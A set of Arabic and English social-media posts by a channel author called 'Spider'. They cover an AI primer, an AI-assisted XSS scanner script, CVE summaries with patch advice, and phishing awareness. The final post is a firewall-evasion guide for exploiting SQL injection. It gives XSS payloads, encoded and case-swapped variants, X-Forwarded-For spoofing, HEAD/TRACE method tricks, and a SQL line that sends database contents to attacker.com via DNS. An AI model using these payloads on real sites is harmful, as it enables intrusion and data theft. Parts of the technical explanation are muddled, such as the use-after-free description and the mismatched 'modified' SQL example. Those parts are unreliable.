* انا عارف ان في ناس طلبت نشرح red team بس هنخليها مره تانيه و النهارده ب اذن الله هنشرح الذكاء الاصطناعي و اي هو و ازاي تتعلم ai *

تنويه هام : المحتوي المقدم ل قناه له حقوق طبع و نشر و يرجي عدم سرقه المحتوي و ذكر اسمك ممكن النشر ولكن عدم ذكر اسمك و شكرا 🤍



السلام عليكم ورحمه الله وبركاته

ازيكم يشباب اخباركم اي معكم اخوكم سبايدر و النهارده هنشرح ازاي تتعلم ذكاء اصطناعي و اي هو



اول حاجه اي هو الذكاء الاصطناعي ببساطه الذكاء الاصطناعي عباره عن كود

كود كود ازاي ؟

ايو هو مجموعه من لاكواد مكتوبه بطريقه معينه بحيث تكون منظمه اكتر و خورزميات متقدمه بتسمح ل كود التعلم الذاتي و دا اسمو ديب ليرن

طيب اي الفرق بين الذكاء الاصطناعي و الكود العادي ؟

الكود العادي لي قواعد ثابته بمعني انه بيكتب الكود عادي بدون تغير انما الذكاء الاصطناعي مش ثابت يقدر يتعلم و يفهم

طيب ازاي بيتعلم و ازاي بيفهم ؟


عن طريق الشبكه العصبيه الشبكه العصبيه بختصار زي تفكيرك ازاي بتفهم

طيب دلوقت انا فهمت يعني اي ذكاء اصطناعي اي هو الماشين ليرن و ديب ليرن ؟


بص ديب ليرن دا جزء من ماشين ليرن بمعني هجبلك مثال it في منو جزء cyber security هو نفس الفكره

طيب اي هو الماشين ليرن ؟

الماشين ليرن بيتعلم الحاجه بدون كتابه اكواد صريحه

يعني يسبايدر الماشين ليرن بيكتب من غير اكواد ؟

مش بظبط اوي هو بيتعلم من الداتا من غير كتابه اكواد صريحه شبه لما تعلم طفل صغير الفرق بين القطط و الكلاب

طيب سوال اي فائده الذكاء الاصطناعي ؟

تقصد فؤاد الذكاء الاصطناعي فؤاد كتيره جدا منهم انو بيدخل ف كل شئ حرفيا زي الصناعه و التجاره و تعليم


طيب الذكاء الاصطناعي ممكن ياخد دور البشر ؟

لا و ايو فنفس الوقت

لا لن الذكاء الاصطناعي حتا لو بقي بيتعلم ذاتي و بيصنع نفسو ذاتي محتاج انسان يتابع وره و مش هيوصل ل كمال

طيب ايو ليه ؟

لن في شغل الذكاء الاصطناعي بقي بديل لي زي السواقين و هتشوف اكتر ف اليابان


طيب نيجي لسوال المهم اتعلم ذكاء اصطناعي منين و ازاي ؟

بص الموضوع بسيط لو انت اتعلمت بايثون هتعرف تتعلم ذكاء اصطناعي

طيب اي مرحله الي اتعلم فيها ؟

كل ما انت تتعلم مكتبات الذكاء الاصطناعي و كنت متفوق ف بايثون كل ما مهاراتك ف ai بتبقي اقوي و افضل و هسيب ليكم المصادر عشان تذاكرو منها

طب مكتبات زي اي ؟

PyTorch و دي افضل مكتبه بايثون من وجهه نظري



شكرا علي قرائه المقال حاولت اخلص في شويت حاجت ايو مش نزلت كل حاجه عن ذكاء اصطناعي عشان مستقبل نشرح ب تعمق اكتر شير المجتمع عايزين نوصل 100 عشان محضر مسابقه كبيره و شكرا ليكم 🤍

Important Notice:

The content presented in this channel is copyrighted. You may share it, but please do not claim it as your own. Thank you 🤍


---

Introduction to Artificial Intelligence (AI) and How to Learn It

Hey everyone!

I hope you’re all doing well. This is Spider, and today we’ll be discussing Artificial Intelligence (AI)—what it is, how it works, and how you can learn it.

What is Artificial Intelligence (AI)?

Simply put, AI is code—but not just any code.

How is AI just code?

AI consists of structured code and advanced algorithms that allow it to learn on its own, a process known as Deep Learning (DL).

What’s the difference between AI and regular code?

Regular code follows fixed rules—it executes instructions exactly as written.
AI, on the other hand, is not static; it can learn and adapt.

How Does AI Learn?

AI learns through Neural Networks, which work similarly to how humans think and process information.

What is Machine Learning (ML) and Deep Learning (DL)?

Deep Learning (DL) is a subset of Machine Learning (ML), just like Cybersecurity is a subset of IT.

Machine Learning (ML) enables systems to learn from data without explicitly written rules.


Does Machine Learning write code on its own?

Not exactly! It learns patterns from data without requiring explicit programming for every scenario—similar to how a child learns to differentiate between cats and dogs.

Why is AI Important?

AI has countless applications across industries, including:

Manufacturing

Commerce

Education


Can AI Replace Humans?

Yes and no.

No, because AI still requires human supervision and will never reach absolute perfection.

Yes, because AI is already replacing jobs, such as drivers, and you’ll see more automation, especially in places like Japan.


How to Learn AI?

The process is simple:

1. Learn Python → The most widely used language in AI.


2. Master AI Libraries → The more proficient you are in Python, the stronger your AI skills will be.



Best AI Libraries to Learn

One of the best libraries for AI is PyTorch, which I highly recommend.


---

Thank you for reading! This was just a brief introduction to Artificial Intelligence—I didn’t cover everything because we’ll go deeper in future discussions.

Share the community! We’re aiming for 100 members, and I’m preparing a big competition. Stay tuned! 🤍

ازيك يعزيزي عارف اني غبت عليك بس الحقيقه ان جمعه كانت جازه المهم

تحزير محتوي قناه له حقوق طبع و نشر*

النهارده هنشرح ازاي تدمج ما بين الذكاء الاصطناعي و السايبر سكيورتي 😁


و اي مرتبات الناس زي 😁


بسم الله الرحمن الرحيم 🤍


اول حاجه ازاي تدمج ما بين الai و السايبر سكيورتي 🤔


هقولك بسيطه انت دلوقتي مبرمج ai كل ما عليك انك تكتب اسكربت بوت يقوم ب عمليه تحليل 🤖


هو ممكن اعمل لاسكربت دا ف كذا شئ ولا شئ واحد 🤔


هقولك انك ممكن تعملو ف مجال malware analysis و web pentest و مجال بردو بره السايبر اسمو data analyst و mobile مجالات كتيره بتبقي متاحه ليك 🤍



طيب نشرح فل ويب ازاي بتعمل كد فل ويب 🤔


ببساطه بعد ما تعلمت ازاي اكتب اسكربت كتبت اسكربت يتيح ليك تجربه الثغرات و تحليل الثغرات الممكنه زي xss 🤖

مثال علي كد 👇🏻


import requests
from bs4 import BeautifulSoup
import openai
#اكتب هنا api key بتاعك
openai.api_key = "YOUR_OPENAI_API_KEY"

xss_payloads = [
"<script>alert(1)</script>",
"\"'><script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
"\" onmouseover=alert(1)//"
]

def analyze_response(response_text, payload):
prompt = f"Does this HTML response indicate a successful XSS attack with payload '{payload}'? Analyze and explain:\n\n{response_text}"
try:
response = openai.ChatCompletion.create(
model="gpt-4",
messages=[{"role": "user", "content": prompt}]
)
return response["choices"][0]["message"]["content"]
except Exception as e:
return f"AI Analysis Error: {str(e)}"

def test_xss(url, param):
for payload in xss_payloads:
try:
params = {param: payload}
response = requests.get(url, params=params)
soup = BeautifulSoup(response.text, 'html.parser')

# Check if payload exists in executable contexts (e.g., script tags, attributes)
is_vulnerable = False
for script in soup.find_all('script'):
if payload in script.string:
is_vulnerable = True
for tag in soup.find_all():
for attr in tag.attrs:
if payload in str(tag.attrs[attr]):
is_vulnerable = True

if is_vulnerable:
print(f"[+] Potential XSS found at {url} with {param}={payload}")
else:
print(f"[-] No XSS in {param}={payload}")

ai_analysis = analyze_response(response.text, payload)
print("[AI Analysis]:", ai_analysis)

except requests.RequestException as e:
print(f"Request failed: {str(e)}")

target_url = "http://testserver/xss_test.php"
parameter = "q"
test_xss(target_url, parameter)



طيب علي كد ممكن اضيف الai في ادوات عندي 🤔


هقولك ايو لو انت كاتب لادوات او بتستخدم ادوات زي مثلا burpsuite ف كل الحاجت دي دخل فيها ai و هتوفر عليك حاجت كتير الذكاء الاصطناعي هدفو انو يساعدك مش انو يكون بديلك 🤍🤖



شكرا علي قرأ المقال حاولت اكون خفيف في و اشوفكم علي خيرت الله 🤍🤖

How to Integrate AI with Cybersecurity 😁

*Warning: This content is copyrighted.

Today, we’ll explain how to combine AI and cybersecurity 😁

And, of course, what are the salaries in this field? 😁

Bismillah 🤍

How to integrate AI with cybersecurity? 🤔

It's simple! If you're an AI programmer, all you need to do is create a bot script that performs analysis 🤖

Can this script be used for multiple things or just one? 🤔

Of course, you can use it in multiple fields, such as:

Malware analysis

Web penetration testing

Data analysis (outside cybersecurity)

Mobile security and many more! 🤍


How to automate web security testing? 🤔

Once you learn how to write scripts, you can create a tool that tests vulnerabilities like XSS and analyzes potential security flaws. 🤖

Example script: 👇🏻

import requests
from bs4 import BeautifulSoup
import openai

# Add your OpenAI API key here
openai.api_key = "YOUR_OPENAI_API_KEY"

xss_payloads = [
"<script>alert(1)</script>",
"\"'><script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
"\" onmouseover=alert(1)//"
]

def analyze_response(response_text, payload):
prompt = f"Does this HTML response indicate a successful XSS attack with payload '{payload}'? Analyze and explain:\n\n{response_text}"
try:
response = openai.ChatCompletion.create(
model="gpt-4",
messages=[{"role": "user", "content": prompt}]
)
return response["choices"][0]["message"]["content"]
except Exception as e:
return f"AI Analysis Error: {str(e)}"

def test_xss(url, param):
for payload in xss_payloads:
try:
params = {param: payload}
response = requests.get(url, params=params)
soup = BeautifulSoup(response.text, 'html.parser')

# Check if payload exists in executable contexts (e.g., script tags, attributes)
is_vulnerable = False
for script in soup.find_all('script'):
if payload in script.string:
is_vulnerable = True
for tag in soup.find_all():
for attr in tag.attrs:
if payload in str(tag.attrs[attr]):
is_vulnerable = True

if is_vulnerable:
print(f"[+] Potential XSS found at {url} with {param}={payload}")
else:
print(f"[-] No XSS in {param}={payload}")

ai_analysis = analyze_response(response.text, payload)
print("[AI Analysis]:", ai_analysis)

except requests.RequestException as e:
print(f"Request failed: {str(e)}")

target_url = "http://testserver/xss_test.php"
parameter = "q"
test_xss(target_url, parameter)

Can AI be integrated into security tools? 🤔

Yes! If you're developing tools or using Burp Suite, AI can enhance automation and vulnerability detection. AI is not a replacement, but a powerful assistant 🤍🤖

Thanks for reading! I hope you found this useful. See you next time! 🤍🤖

ندخل 120 و في مفاجاه

متيجو نكلم عن حاجه خطر كد ☠️

تحذير المحتوي لي حقوق طبع و نشر ⭐


النهارده هنتكلم عن cve قريب جدا من شهر مارس يوم 11 تم تسجيل cve بعنوان

CVE-2025-24064

اوبااا بيعمل اي دا ي سبايدر ؟

انا هقولك يعزيزي الcve دا او الثغره لامنيه بمعني اصح بتعمل

Use-After-Free

يعني اي استخدام بعد حر دا 🤔

انا هقولك دي ثغره بتم ف data بتاعت الشبكه او الجهاز او لغه علي حسب استخدامك و بتم عن طريق بايلود
(free())

نرجع ل موضوعنا 😁

الcve بيتم ف شبكه عن بعد تحديدا Windows DNS Server و بيخلي المهاجم ينفذ كود uaf و يعطل dns عن مستخدم windows درجه خطوره cve 8.1 يعني انو خطر ممكن المهاجم يعمل ريفيرس شيل عن طريقها ف المستخدم الي حصل في الثغره و دي شغالها علي لانظمه التاليه



Windows Server 2022

Windows Server 2019

Windows Server 2016

Windows Server 2012


حلك انك تحدث النظام بشكل مستمر و تراقب حركات مرور dns
عن طريق
IDS
او
IPS

Let’s talk about something dangerous ☠️

⚠ Content warning: This content is copyrighted. ⭐


---

Today, we’ll discuss a CVE that was recently registered on March 11, 2025, titled:

CVE-2025-24064

Whoa! What does this do, Spider?

I’ll tell you, my friend! This CVE or security vulnerability exploits a Use-After-Free (UAF) bug.

🤔 What is Use-After-Free?

It’s a vulnerability that occurs in data handling within a network, device, or programming language, depending on how it is used. It is triggered through a payload using free(), leading to unexpected behavior.


---

😁 Back to our topic!

This CVE affects Windows DNS Server over a network.
It allows an attacker to execute UAF-based code, potentially disrupting DNS services for Windows users.

It has a severity score of 8.1, meaning it's highly dangerous.
A successful attacker could execute a reverse shell, gaining access to the vulnerable system.

🛠️ Affected systems:

Windows Server 2022

Windows Server 2019

Windows Server 2016

Windows Server 2012



---

🔒 How to protect yourself?

✔ Update your system regularly to patch vulnerabilities.
✔ Monitor DNS traffic using IDS (Intrusion Detection System) or IPS (Intrusion Prevention System) to detect and prevent exploit attempts.

﴿ وَ أذكُرٌ رَبُكَ إِذا نَسيتّ ﴾
· سُبحان الله
· الحمد لله
· الله أكبر
· أستغفر الله
· لا إله إلا الله
· لا حول ولا قوة إلا بالله
· اللهُم صلِّ وسلِم على نبينا محمد
· سُبحان الله وبحمده سُبحان الله العظيم

متيجو نتكلم عن zero day فل ايفون 💀


اي يعم سبايدر انت بتقول اي 😂

طب اشتري مني لاخر 😁

*تحذير محتوي قناه له حقوق طبع و نشر ⭐


موضوعنا النهارده عن

CVE-2025-24201

الثغره دي تعتبر زيرو داي لنها يوم 14 مارس 💀

المهم الثغره دي اكتشفوها في متصفح WebKit

استناااا مش WebKit دا الي ف سفاري ( Safari )

ايو يعزيزي كلمك صح انت معك ايفون ولا اي ؟

المهم نوع الثغره ( Out-of-Bounds Write )

اي الثغره دي ؟

انا هقولك الثغره دي بتحصل لما كتابه البيانات في الذاكره المفروض بيكون في حدود امنيه تمنع التعديل علي موقع غير مخصصه ليها الحقيقة مش موجوده و الثغره دي بتيح ان يحصل rce علي التلفون

الحمدالله اني منزل تحديث ios 18

مش عايز اصدمك يعزيري بس هيا بتشتغل علي

iOS 18.3.2 وما قبله

iPadOS 18.3.2 وما قبله

macOS Sequoia 15.3.2 وما قبله

Safari 18.3.1 وما قبله

visionOS 2.3.2 وما قبله

طيب الحل اي ؟

نزل تحديث ios جديد ✅

نزل برامج حمايه antivirus ✅

خلي بالك من محتوي المشبوه ✅


مصدر الثغره :

https://nvd.nist.gov/vuln/detail/CVE-2025-24201

Let’s Talk About a Zero-Day in iPhone 💀

What’s up, Spider? What are you talking about? 😂

Alright, let me break it down for you. 😁

🚨 Content Warning: This channel holds copyright rights. ⭐


---

Today's Topic: CVE-2025-24201

This vulnerability is classified as a zero-day because it was discovered on March 14 💀.

The flaw was found in the WebKit browser engine.

Wait a minute... isn’t WebKit the engine used in Safari?

Yes, my friend, you got that right! Do you own an iPhone or what?


---

What’s the Type of This Vulnerability?

📌 Out-of-Bounds Write

What does that mean? 🤔

Well, normally, when writing data to memory, there should be security boundaries that prevent modification of unauthorized memory locations. However, this vulnerability bypasses those boundaries, allowing an attacker to execute Remote Code Execution (RCE) on the target device.


---

Which Devices Are Affected?

The vulnerability affects the following systems:

iOS 18.3.2 and earlier

iPadOS 18.3.2 and earlier

macOS Sequoia 15.3.2 and earlier

Safari 18.3.1 and earlier

visionOS 2.3.2 and earlier



---

How to Protect Yourself?

✅ Update to the latest iOS version.
✅ Install antivirus and security software.
✅ Be cautious of suspicious content and links.


---

Source of the CVE:

https://nvd.nist.gov/vuln/detail/CVE-2025-24201

قال رسول الله عليه الصلاة والسلام (اذا مات ابن ادم انقطع عمله الا من ثلاث صدقة جارية او علم ينتفع به او ولد صالح يدعو له)

بوست النهارده ميكس بين الذكاء الاصطناعي و السايبر سكيورتي 💀


تحذيرين

لاول : القناه غير مسؤوله عن الذي سوف يتم ما يتم فعلها من الشخص دا مقال علمي و مفيد


التاني : القناه ليها حقوق طبع و نشر عايزها تدخل تكلمني خاص


نرجع ل موضوعنا 😁

الوقتي بقي بيحصل اعمال بين الذكاء الاصطناعي و السايبر سكيورتي و منهم اعمال فيشينج

وه فيشينج يسبايدر 😱


بص يعزيزي عشان عارف انت دلوقتي بتقول اي الفيشينج دا اختصار ان الفيشينج دا بيكون صفحه مزوره بتكتب بيها بياناتك و بتروح ل صاحب الصفحه و بتكون شبه الموقع الحقيقي بظبط

المهم الوقتي بقي في ناس في اوروبا تحديدا بيستخدمو ai ( مش متعلمين برمجه ) عشان يكتب كود صفحه مزوره شبه Facebook و انت تدخل عليها و فجاه تلقي حسابك راح دا غير انو بيكون عندو عنوانك ( ip ) و عن طريق ip يقدر يجيبو و بعدها طورو الموضوع بقو بيستخدمو الذكاء الاصطناعي علي اساس انهم حد من بنك او نجم مشهور و يكلموك من فيك اكونت او فيك نمبر ولو كلمك من فيك اكونت يعمل فيديو علي اساس انو نجم دا او الشخص دا و فيك نمبر بيغير الصوت الموضوع دا قالب أوروبا كلها ف خلي بالكم ❤️


الحل اي طيب يا سبايدر 🙂


بص اول حاجه

مش ترد علي رقم غريب يعني لو لقيت رقم و بيقولك انا محمد رمضان و بيقولك عنوانك و رقم الفيزه قولو انت حمضان

مش تقبل اي اكونت فيك غير لما تتاكد انو شخص حقيقي

مش ترد علي اي رساله مجهوله فل sms او الواتس او او

مش تدخل علي لينكات مشبوهة يعني مثلا

www.fecebook.com

انصحك تشير البوست فل خير مش شرط كتابه محتوي نفسو مجاني ولكن كتابه ليها الحقوق طبع و النشر اتمنه تخلي بالكم ❤️

مصدر :

⚠️ Two Warnings Before We Start:
1️⃣ This channel is not responsible for any misuse of the information provided. This is purely for educational purposes.
2️⃣ All rights reserved. If you want to share the content, contact me first.

🤖 AI & Cybersecurity - Phishing Spider 🕷️

Artificial intelligence is now being used in cybercrime, and one of the biggest threats is phishing attacks.

What is phishing?
Phishing is when hackers create fake websites that look exactly like real ones (e.g., Facebook) to steal your login credentials.

What’s new?
In Europe, even people with no coding skills are now using AI to generate phishing pages that are almost indistinguishable from the original. If you enter your credentials, your account is gone instantly!

Even worse, scammers now use AI-powered tactics to impersonate banks or celebrities:

Deepfake videos to mimic famous people.

Voice cloning to sound like someone you trust.

Fake numbers to contact victims and gain their trust.


This technique is spreading rapidly in Europe, so be careful!

🛡️ How to Protect Yourself?

✅ Do not answer calls from unknown numbers, even if they claim to be a celebrity or a bank official.
✅ Do not accept friend requests from suspicious accounts without verifying their identity.
✅ Do not reply to unknown messages via SMS, WhatsApp, or other platforms.
✅ Do not click on suspicious links, for example:
❌ www.fecebook.com instead of www.facebook.com

Share this post to raise awareness! Cybersecurity starts with knowledge. ❤️

زي مشرحنا ios جه دور لاندرويد


*تحذيرين*


الاول : القناه غير مسؤوله عن فعل مستخدم

التاني : القناه ليها حقوق طبع و نشر


نرجع ل موضوعنا 😁


النهارده هنتكلم عن cve فريد من نوعو

لسه نازل من قريب يعتبر و ركز يعتبر

زيرو داي cve النهارده اسمو

CVE-2025-0074


التاريخ : 2024 ديسمبر يوم 13 و 2025 مارس يوم 3 💀


بيعمل اي الcve دا يا سبايدر 🙂

بص يعزيزي الcve بيشتغل عن طريق

بلوتوث بدون ركز معايا ف دي لا اذن من

مستخدم ولا اضافات ولا امتيازت

ينهار ابيض يا سبايدر يعني انا ممكن

اشوف حد عمل cve دا علي جهازي و انا مش عارف 😱

هقولك ايو و كمان هيعمل rce 😁

الله يطمنك طمنتني 🙂

نرجع لموضوعنا ال cve بيشتغل عن

طريق هجمه UAF ( Use-After-Free )

و المره دي بتيح ان الشخص يكتب كود

برمجيات خبيثه ( malware ) علي جهاز

الضحيه بدون علم منو و الثغره تم

تنصيفها انه حرجه ( Critical )

طب الحمدالله انا جهازي اندرويد 14


ياااا يعزيزي يوسفني اقولك انو بيبداء من اول

اندوريد 14 و اندرويد 13 و اندرويد 12


و اندوريد 11 بس الخبر الحلو مش


بتشتغل علي اندوريد قبل 11 يعني


اندرويد 9 عادي و اقل منو


طيب الحل اي ؟

الحل :

تحدث اخر اصدار عندك ✅

تنزل antivirus ✅

مش تبقي فاتح بلوتوث كتير ✅


شكرا علي دعمكم لولا دعمكم ليا مش

طورت المحتوي و دايما بحاول اطورو

بسبب دعمكم و شكرا 🤍


مصدر :


https://www.cve.org/CVERecord?id=CVE-2025-0074

https://vulert.com/vuln-db/CVE-2025-0074


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074


https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304

As We Explained iOS, Now It's Android's Turn!

⚠️ Two Warnings:

1. The channel is not responsible for any misuse of this information.


2. All content is copyrighted. Contact us for permissions.




---

📌 Today’s Topic: A Unique CVE!

A recently discovered zero-day vulnerability:

CVE-2025-0074

📅 Date of Discovery: December 13, 2024
📅 Security Patch Released: March 3, 2025 💀


---

🔥 What Does This CVE Do?

This vulnerability exploits Bluetooth in a completely silent way—
🚫 No user permission required
🚫 No additional software needed
🚫 No special privileges required

🤯 So, someone can exploit this CVE on my device without me knowing?

✔ Yes! And it allows Remote Code Execution (RCE). 😁


---

🛠️ How It Works

The attack is based on a Use-After-Free (UAF) vulnerability,
which allows an attacker to inject and execute malicious code (malware) on the victim’s device without their knowledge.

🚨 Severity Level: Critical


---

📱 Affected Devices

Bad news: 😢

Affects Android 11, 12, 13, and 14.


Good news: 😃

Does NOT affect Android 9 and lower.



---

✅ How to Protect Yourself?

1️⃣ Update to the latest security patch ✅
2️⃣ Use a trusted antivirus ✅
3️⃣ Keep Bluetooth disabled when not in use ✅


---

💡 Thanks for your support! Your engagement helps me improve the content every day. Stay safe! 🤍


Source :

https://www.cve.org/CVERecord?id=CVE-2025-0074

https://vulert.com/vuln-db/CVE-2025-0074


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074


https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304

تعالو نتكلم عن موضوع مهم جدا و الي

هو ازاي نعمل bypass لي

waf ( web application firewall )

تحذير :

1 : القناه غير مسؤوله عن اي فعل خارج لاطار التعليمي

2 : ممنوع نشر المقال دون ذكر اسم القال يكمن نشر المعلومه ولكن لا يمكن نشر الكتابه بحد ذاتها الي ب اذن من صاحب قناه


نفترض عندنا سيناريو ل واحد نسمي

حماصه حماصه كان قعد يهنت ولقي ثغره

sql injection

شرح سريع : sql injection دي بتحقن

بايلود في اكواد sql بتاع موقع عشان

تسحب داتا خاصه

المهم حماصه لما جه يستغل ثغره معرفش

معرفش يعملها exploit بسبب waf

طيب حماصه يعمل اي ؟

انا هقولك ✨

اول حاجه : حماصه يجرب يلعب في

بايلود يعمل encode بختصار

طب زي اي يا سبايدر 🤔

زي بايلود xss

<script>alert(1)</script>

نفسو بعد ما تعمل encode url

%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alertxss%3E

بايلود وقتها بيشتغل عادي كنو نفس لاول

طيب نفرض مش اشتغل 🤔

تاني خطوه :

تلاعب في headers

اي التلاعب في الهيدر دي ؟

شوف تلاعب في الهيدر بتكون انك تحاول

تغير حمايه زي X-Original-URL

طيب ازاي 🤔

بسيطه

GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1

طيب نفرض انها مش اشتغلت نعمل اي ؟

نيجي لي خطوه تالته :

نجرب نعدل ف HTTP ممكن نخلي

TRACE
و يشتغل معانا

مثال

HEAD /admin HTTP/1.1
او
TRACE /admin HTTP/1.1

بدل get او post

طيب نفترض مش اشتغلت 🤔

نيجي لي طريقه الرابعه :

الخطوه دي شبه الي فاتت ولكن انت

هتجرب تعدل الملف يكون مثلا xml

مثال :
/admin.json

طيب نفترض مش اشتغلت 😂🤔

هقولك بردو في خطوه خامسه 😂

الخطوه الخامسه :

و دي بسيطه في waf بيكون مش عارف

يفرق بين الحروف الصغيره من حروف
الكبير

بتهزر يا سبايدر يعني waf طلع غبي كد

هقولك ايو مثال

<script>alert(1)</script>

دا كود xss عادي

<Script>alert(1)</Script>

هو نفس الكود بنفس الطريقه

طيب نفترض مش اشتغلت 🤔

هقولك في طريقه سادسه :


الطريقه دي ممكن تتلاعب ف dns خاص

بل موقع

مثال :

SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\',database()));

دا بايلود عادي

SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);

بعد تعديل

طيب لو نجحت ؟

اخر طريقه و هيا السابعه :

شوف اصدار waf و دور علي cve لي

و جرب cve كلهم لحد ما تقدر تعمل bypass

شكرا ل قرائه المقال حاولت اكون خفيف و ملم بكل شئ 🤍